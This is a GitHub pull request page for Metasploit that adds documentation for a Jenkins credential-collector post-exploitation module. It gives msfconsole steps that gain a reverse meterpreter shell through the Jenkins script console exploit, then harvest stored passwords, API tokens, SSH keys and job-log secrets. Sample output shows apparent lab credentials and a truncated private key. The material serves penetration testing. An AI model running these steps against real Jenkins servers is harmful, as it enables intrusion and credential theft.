Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add post module multi/gather/jenkins #8627

Merged
merged 7 commits into from Aug 9, 2017
Merged

Add post module multi/gather/jenkins #8627

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
10c663d
initial commit
thesubtlety Jun 27, 2017
29c6f41
add longer timeout for large file systems
thesubtlety Jun 27, 2017
e1ca78e
add option to enable job log parsing
thesubtlety Jun 27, 2017
a87f937
fix msftidy warning
thesubtlety Jun 28, 2017
47f55b1
add documentation
thesubtlety Jul 19, 2017
5d4105d
minor fixes per rubocop
thesubtlety Jul 19, 2017
7d03368
clean up formatting
thesubtlety Jul 19, 2017
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
206 changes: 206 additions & 0 deletions documentation/modules/post/multi/gather/jenkins_gather.md
View file
Open in desktop
@@ -0,0 +1,206 @@
## Vulnerable Application

Official Source:
[Jenkins](https://jenkins.io/download/)

This module has been verified against:

1. Jenkins 2.67 on Ubuntu 16.04 in Docker
1. Jenkins 2.67 on Windows 7 SP 1
1. Jenkins 2.60.1
1. Jenkins 1.56

## Verification Steps

1. Set up Jenkins to obtain a shell (use Docker for quick setup)
1. Run `docker run -p 8080:8080 -p 50000:50000 jenkins`
1. Use the default setup and install "suggested plugins"
1. Create new user admin, add a user or credential (via Manage Jenkins)
1. Start msfconsole
1. We'll use the `jenkins_script_console` module to quickly gain a shell
1. Do: ```use exploit/multi/http/jenkins_script_console```
1. Do: ```set RHOST 172.17.0.1```
1. Do: ```set RPORT 8080```
1. Do: ```set TARGETURI /```
1. Do: ```set USERNAME admin```
1. Do: ```set PASSWORD or set API_TOKEN```
1. Do: ```set TARGET 1```
1. Do: ```set PAYLOAD linux/x86/meterpreter/reverse_tcp```
1. Do: ```set LHOST 192.168.56.105```
1. Do: ```exploit -j```
1. Do: ```use post/multi/gather/jenkins_gather```
1. Do: ```set SESSION 1```
1. Do: ```run```
1. You should see the saved credentials output

## Options

**SEARCH_JOBS**

This option searches through the `jobs` folder for interesting
keywords but obviously increases runtime on larger instances.

**STORE_LOOT**

This option saves interesting files and loot to disk. If set to
false will simply output data to console.

## Scenarios

**Jenkins on Windows**

```
msf post(jenkins_gather) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
18 shell x86/linux 192.168.56.105:4444 -> 192.168.56.1:58828 (172.17.0.1)
20 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 192.168.56.105:4444 -> 192.168.56.1:58974 (172.17.0.2)
21 meterpreter x86/windows NT AUTHORITY\SYSTEM @ kali 192.168.56.105:4444 -> 192.168.56.101:50427 (192.168.56.101)
23 shell x86/windows 192.168.56.105:4444 -> 192.168.56.101:50793 (192.168.56.101)

msf post(jenkins_gather) > info

Name: Jenkins Credential Collector
Module: post/multi/gather/jenkins_gather
Platform: Linux, Windows
Arch:
Rank: Normal

Provided by:
thesubtlety

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SEARCH_JOBS true no Search through job history logs for interesting keywords. Increases runtime.
SESSION 17 yes The session to run this module on.
STORE_LOOT true no Store files in loot (will simply output file to console if set to false).

Description:
This module can be used to extract saved Jenkins credentials, user
tokens, SSH keys, and secrets. Interesting files will be stored in
loot along with combined csv output.


msf post(jenkins_gather) > run

[*] Searching for Jenkins directory... This could take some time...
[*] Found Jenkins installation at C:\Program Files\Jenkins
[+] Credentials found - Username: user1 Password: Password123456
[+] SSH Key found! ID: 83c6a18f-6b35-420a-8534-cc505c3347b5 Passphrase: secretpassphrase123 Username: sshkey1 Description: interesting description
[+] Job Info found - Job Name: User: testpass Password: secretpass123
[+] Job Info found - Job Name: User: testpass Password: ohwowosupersecret
[+] Node Info found - Name: test Host: hostnode1.lab.local Port: 22 CredID: 972fc428-dd7c-46ea-a119-be78ae0866ad
[+] API Token found - Username: admin Token: 8a114e0fa48c1a489c39b98e94c986c8
[+] API Token found - Username: useruseruser Token: 6810c3f6ccca939ac2a8b8ac4b9de012
[*] Searching through job history for interesting bits...
[+] Job Log truffles:
C:\Program Files\Jenkins\jobs\asdf\builds\4\log:C:\Program Files\Jenkins\workspace\asdf>echo "secret is secret"
C:\Program Files\Jenkins\jobs\asdf\builds\4\log:"secret is secret"
...
C:\Program Files\Jenkins\jobs\asdf\lastSuccessful\log:C:\Program Files\Jenkins\workspace\asdf>echo "secret is secret"
C:\Program Files\Jenkins\jobs\asdf\lastSuccessful\log:"secret is secret"
[+]
Creds
=====

Username Password Description
-------- -------- -----------

testpass secretpass123
testpass ohwowosupersecret
user1 Password123456

[+]
API Keys
========

Username API Tokens
-------- ----------
admin 8a114e0fa48c1a489c39b98e94c986c8
useruseruser 6810c3f6ccca939ac2a8b8ac4b9de012

[+]
Nodes
=====

Node Name Hostname Port Description Cred Id
--------- -------- ---- ----------- -------
test hostnode1.lab.local 22 testtesttest 972fc428-dd7c-46ea-a119-be78ae0866ad

[+] SSH Key
[*] ID: 83c6a18f-6b35-420a-8534-cc505c3347b5
[*] Description: interesting description
[*] Passphrase: secretpassphrase123
[*] Username: sshkey1
[*]
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAuTfL0ijR0JDLTQC092ZolnkTJGRi7YQInK/K1ZFDFc44JOSU
...snip...
7Ad+Ja6+51ECnXJIFKPj7binB6/C10YVqHh4KON3DeA6ZA7ZpUko
-----END RSA PRIVATE KEY-----

[*] Post module execution completed


```

**Jenkins 2.67 on Ubuntu 16.04**

```
msf post(jenkins_gather) > set session 20
session => 18
msf post(jenkins_gather) > info

Name: Jenkins Credential Collector
Module: post/multi/gather/jenkins_gather
Platform: Linux, Windows
Arch:
Rank: Normal

Provided by:
thesubtlety

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SEARCH_JOBS true no Search through job history logs for interesting keywords. Increases runtime.
SESSION 17 yes The session to run this module on.
STORE_LOOT true no Store files in loot (will simply output file to console if set to false).

Description:
This module can be used to extract saved Jenkins credentials, user
tokens, SSH keys, and secrets. Interesting files will be stored in
loot along with combined csv output.

msf post(jenkins_gather) > run

[*] Searching for Jenkins directory... This could take some time...
[*] Found Jenkins installation at /root/.jenkins
[+] Credentials found - Username: thanksforthefish Password: whatagreatbook
[+] API Token found - Username: user1 Token: 859e1d6ee6ab85804434fa5395ab962d
[+] API Token found - Username: admin Token: 9da706c125a4b5a4c19b1f799723175c
[*] Searching through job history for interesting bits...
[+]
Creds
=====

Username Password Description
-------- -------- -----------
thanksforthefish whatagreatbook

[+]
API Keys
========

Username API Tokens
-------- ----------
admin 9da706c125a4b5a4c19b1f799723175c
user1 859e1d6ee6ab85804434fa5395ab962d

[*] Post module execution completed
```